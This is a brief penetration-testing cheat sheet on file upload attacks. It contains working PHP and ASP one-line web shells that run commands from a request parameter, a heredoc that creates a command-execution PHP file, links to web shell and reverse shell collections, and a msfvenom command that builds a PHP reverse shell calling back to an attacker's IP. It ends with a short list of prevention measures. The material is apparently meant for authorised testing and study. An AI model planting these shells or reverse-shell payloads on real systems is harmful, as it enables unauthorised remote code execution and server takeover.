File Upload Attacks

cat << EOF > RCE.php
<?php system('hostname'); ?> 
EOF

Web Shells

GitHub - Arrexel/phpbash: A semi-interactive PHP shell compressed into a single file.GitHub

SecLists/Web-Shells at master · danielmiessler/SecListsGitHub

Custom Shell

<?php system($_REQUEST['cmd']); ?>

<% eval request('cmd') %

Reverse Shell

GitHub - pentestmonkey/php-reverse-shellGitHub

Custom Reverse Shell

$ msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php

-p is the payload

-f is the output language

---

Prevention

• Extension Validation

• Content Validation

• restrict open_basedir

• disable_functions in php.ini